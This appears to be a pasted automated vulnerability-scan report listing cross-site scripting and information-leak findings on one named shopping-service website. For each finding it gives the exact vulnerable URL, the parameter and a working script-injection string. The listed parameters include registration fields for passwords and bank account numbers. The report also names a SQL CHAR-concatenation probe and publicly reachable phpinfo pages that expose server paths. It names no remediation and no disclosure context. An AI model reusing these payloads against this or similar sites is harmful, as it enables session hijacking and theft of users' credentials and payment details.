cz-ebay.cz

1. XSS - Ceske eBay - http://www.cz-ebay.cz/
2.  
3. Cross-site Scripting
4.  
5. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
6.  
7. Vulnerable URL : http://www.cz-ebay.cz/index.php?pg=><body onload=alert(9)>
8. Parameter Name: pg
9. Parameter Type: Querystring
10. Attack Pattern: ><body onload=alert(9)>
11.  
12. Vulnerable URL : http://www.cz-ebay.cz//prevodniky.html
13. Parameter Name: from
14. Parameter Type: Post
15. Attack Pattern: '"--></style></script><script>alert(0x000F8B)</script>
16.  
17. Vulnerable URL : http://www.cz-ebay.cz//prevodniky.html
18. Parameter Name: hodnota
19. Parameter Type: Post
20. Attack Pattern: '"--></style></script><script>alert(0x000F8F)</script>
21.  
22. Vulnerable URL : http://www.cz-ebay.cz//prevodniky.html
23. Parameter Name: to
24. Parameter Type: Post
25. Attack Pattern: '"--></style></script><script>alert(0x000FEC)</script>
26.  
27. Vulnerable URL : http://www.cz-ebay.cz/registrace.html
28. Parameter Name: email
29. Parameter Type: Post
30. Attack Pattern: '"--></style></script><script>alert(0x001090)</script>
31.  
32. Vulnerable URL : http://www.cz-ebay.cz/registrace.html
33. Parameter Name: icq
34. Parameter Type: Post
35. Attack Pattern: '"--></style></script><script>alert(0x00109D)</script>
36.  
37. Vulnerable URL : http://www.cz-ebay.cz/registrace.html
38. Parameter Name: ebay_user_id
39. Parameter Type: Post
40. Attack Pattern: '"--></style></script><script>alert(0x0010A7)</script>
41.  
42. Vulnerable URL : http://www.cz-ebay.cz/registrace.html
43. Parameter Name: ebay_heslo
44. Parameter Type: Post
45. Attack Pattern: '"--></style></script><script>alert(0x0010C3)</script>
46.  
47. Vulnerable URL : http://www.cz-ebay.cz/registrace.html
48. Parameter Name: cislo_uctu
49. Parameter Type: Post
50. Attack Pattern: '"--></style></script><script>alert(0x0010C8)</script>
51.  
52. Vulnerable URL : http://www.cz-ebay.cz/registrace.html
53. Parameter Name: jmeno
54. Parameter Type: Post
55. Attack Pattern: '"--></style></script><script>alert(0x0010D6)</script>
56.  
57. |||
58.  
59. Permanent Cross-site Scripting
60.  
61. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
62.  
63. Vulnerable URL : http://www.cz-ebay.cz/registrace.html
64. Injection URL: http://www.cz-ebay.cz/index.php?pg=processdata
65. Parameter Name: login
66. Parameter Type: Post
67. Attack Pattern: (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
68.  
69. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
70.  
71. Vulnerable URL : http://www.cz-ebay.cz/
72. Vulnerable URL : http://www.cz-ebay.cz/preposilani-zasilek.htm
73. Vulnerable URL : http://www.cz-ebay.cz/aktuality/zasilky-v-pondeli-5-9-nepujdou-40-1582233250.htm
74. Vulnerable URL : http://www.cz-ebay.cz/aktuality/kontejner-do-cr-odjel-14-9-2011-40-1376678108.htm
75. Vulnerable URL : http://www.cz-ebay.cz/aktuality/slevy-v-usa-pondeli-5-9-2011-40-2531919776.htm
76. Vulnerable URL : http://www.cz-ebay.cz/drazby-na-ebay.htm
77. Vulnerable URL : http://www.cz-ebay.cz/platba-za-vas-nakup.htm
78. Vulnerable URL : http://www.cz-ebay.cz/asistovany-nakup.htm
79. Vulnerable URL : http://www.cz-ebay.cz/aktuality/pobocka-v-us-1-8-2011-volno-40-2066549930.htm
80. Vulnerable URL : http://www.cz-ebay.cz/aktuality/pripsani-plateb-sobota-23-7-nejde-40-1585178623.htm
81. Vulnerable URL : http://www.cz-ebay.cz/aktuality/novy-prepravce-velkych-zasilek-40-2317439459.htm
82. Vulnerable URL : http://www.cz-ebay.cz/aktuality.htm
83. Vulnerable URL : http://www.cz-ebay.cz/poslat-heslo.html
84. Vulnerable URL : http://www.cz-ebay.cz/objednavka.html
85. Vulnerable URL : http://www.cz-ebay.cz/onlineplatba.html
86. Vulnerable URL : http://www.cz-ebay.cz/nase-reference.htm
87. Vulnerable URL : http://www.cz-ebay.cz/zjistit-cenu.html
88. Vulnerable URL : http://www.cz-ebay.cz/kontakty.htm
89. Vulnerable URL : http://www.cz-ebay.cz/reference-vase-odkazy.htm
90. Vulnerable URL : http://www.cz-ebay.cz/sledovani-zasiky.htm
91. Vulnerable URL : http://www.cz-ebay.cz/cenik-dopravy-z-usa.html
92. Vulnerable URL : http://www.cz-ebay.cz/nejcastejsi-otazky.htm
93. Vulnerable URL : http://www.cz-ebay.cz/jak-vyplnit-objednavku.htm
94. Vulnerable URL : http://www.cz-ebay.cz/o-nas.htm
95. Vulnerable URL : http://www.cz-ebay.cz//prevodniky.html
96. Vulnerable URL : http://www.cz-ebay.cz/dhl-a-celnice.htm
97. Vulnerable URL : http://www.cz-ebay.cz/e-shopy-v-usa.htm
98. Vulnerable URL : http://www.cz-ebay.cz/tabulky-velikosti.htm
99. Vulnerable URL : http://www.cz-ebay.cz/cisla-nasich-uctu.htm
100. Vulnerable URL : http://www.cz-ebay.cz/jak-se-registrovat-na-paypal.htm
101. Vulnerable URL : http://www.cz-ebay.cz/vseobecne-obchodni-podminky.htm
102. Vulnerable URL : http://www.cz-ebay.cz/baliky-z-cr-do-sveta.htm
103. Vulnerable URL : http://www.cz-ebay.cz/jak-se-registrovat-na-ebay.htm
104. Vulnerable URL : http://www.cz-ebay.cz/aktuality/novinka-zasilame-do-celeho-sveta-40-2572663284.htm
105. Vulnerable URL : http://www.cz-ebay.cz/aktuality/kontejner-do-cr-naklada-se-28-5-40-1590853973.htm
106. Vulnerable URL : http://www.cz-ebay.cz/aktuality/postrehy-z-celnice-po-1-4-40-2143184447.htm
107. Vulnerable URL : http://www.cz-ebay.cz/aktuality/zmena-dph-limitu-od-1-4-40-2177005689.htm
108. Vulnerable URL : http://www.cz-ebay.cz/aktuality/snehova-kalamita-aktualizovano-40-2330487069.htm
109. Vulnerable URL : http://www.cz-ebay.cz/aktuality/dalsi-slevy-v-usa-40-2110623870.htm
110. Vulnerable URL : http://www.cz-ebay.cz/aktuality/statistika-cz-ebay-cz-2010-40-2236731290.htm
111. Vulnerable URL : http://www.cz-ebay.cz/aktuality/pozor-zmena-podavani-reklamace-40-2026090598.htm
112. Vulnerable URL : http://www.cz-ebay.cz/aktuality/nestihli-jste-patecni-slevy-40-1948322321.htm
113. Vulnerable URL : http://www.cz-ebay.cz/aktuality/nejvetsi-slevy-v-usa-aktualizovano-40-2100490938.htm
114. Vulnerable URL : http://www.cz-ebay.cz/aktuality/kontejner-do-cr-sr-40-2503122119.htm
115. Vulnerable URL : http://www.cz-ebay.cz/aktuality/novinka-dobiti-kreditu-online-40-1336274981.htm
116. Vulnerable URL : http://www.cz-ebay.cz/aktuality/pon-6-9-2010-zasilky-neodesilame-40-1560935049.htm
117. Vulnerable URL : http://www.cz-ebay.cz/aktuality/slevy-v-usa-6-9-2010-40-2214264886.htm
118. Vulnerable URL : http://www.cz-ebay.cz/aktuality/co-pripravujeme-40-2397612199.htm
119. Vulnerable URL : http://www.cz-ebay.cz/aktuality/co-prave-prodavame-40-1795285872.htm
120. Vulnerable URL : http://www.cz-ebay.cz/aktuality/doprava-motorky-z-usa-40-1903903449.htm
121. Vulnerable URL : http://www.cz-ebay.cz/aktuality/jak-odesilame-zasilky-z-usa-40-2157712930.htm
122. Vulnerable URL : http://www.cz-ebay.cz/aktuality/kontejner-do-cr-odjizdi-13-8-40-2240573868.htm
123. Vulnerable URL : http://www.cz-ebay.cz/aktuality/zdrzeni-odeslani-zasilek-z-usa-40-2450352741.htm
124. Vulnerable URL : http://www.cz-ebay.cz/aktuality/prvni-zkusenost-z-dhl-40-2470834578.htm
125. Vulnerable URL : http://www.cz-ebay.cz/aktuality/zmena-prepravni-spolecnosti-40-1980042709.htm
126. Vulnerable URL : http://www.cz-ebay.cz/templates/processdata.html
127.  
128. Injection URL: http://www.cz-ebay.cz/registrace.html
129.  
130. |||
131.  
132. [Possible] Permanent Cross-site Scripting
133.  
134. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
135.  
136. Vulnerable URL : http://www.cz-ebay.cz/registrace.html
137. Injection URL: http://www.cz-ebay.cz/index.php?pg=processdata
138. Parameter Name: spamrobot
139. Parameter Type: Post
140. Attack Pattern: <script>ns(0x000DC0)</script>
141.  
142. |||
143.  
144. Database Error Message
145. Severity : Low
146. Confirmation : Confirmed
147. Vulnerable URL : http://www.cz-ebay.cz/templates/processdata.html
148. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
149.  
150. |||
151.  
152. [Possible] Internal Path Leakage (*nix)
153.  
154. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
155.  
156. Severity : Information
157. Confirmation : Confirmed
158. Vulnerable URL : http://www.cz-ebay.cz/phpinfo.php
159. Vulnerable URL : http://www.cz-ebay.cz/admin/phpinfo.php
160.  
161. Identified Internal Path(s): /etc/php5/apache2
162. /etc/php5/apache2/php.ini
163. /etc/php5/apache2/conf.d
164. /etc/php5/apache2/conf.d/curl.ini,
165. /etc/php5/apache2/conf.d/gd.ini,
166. /etc/php5/apache2/conf.d/imagick.ini,
167. /etc/php5/apache2/conf.d/imap.ini,
168. /etc/php5/apache2/conf.d/mcrypt.ini,
169. /etc/php5/apache2/conf.d/mhash.ini,
170. /etc/php5/apache2/conf.d/mysql.ini,
171. /etc/php5/apache2/conf.d/mysqli.ini,
172. /etc/php5/apache2/conf.d/pdo.ini,
173. /etc/php5/apache2/conf.d/pdo_mysql.ini,
174. /etc/php5/apache2/conf.d/pdo_pgsql.ini,
175. /etc/php5/apache2/conf.d/pdo_sqlite.ini,
176. /etc/php5/apache2/conf.d/pgsql.ini,
177. /etc/php5/apache2/conf.d/pspell.ini,
178. /etc/php5/apache2/conf.d/sqlite.ini,
179. /etc/php5/apache2/conf.d/tidy.ini,
180. /etc/php5/apache2/conf.d/xmlrpc.ini,
181.  
182. ---------------------------------------------------------------------------------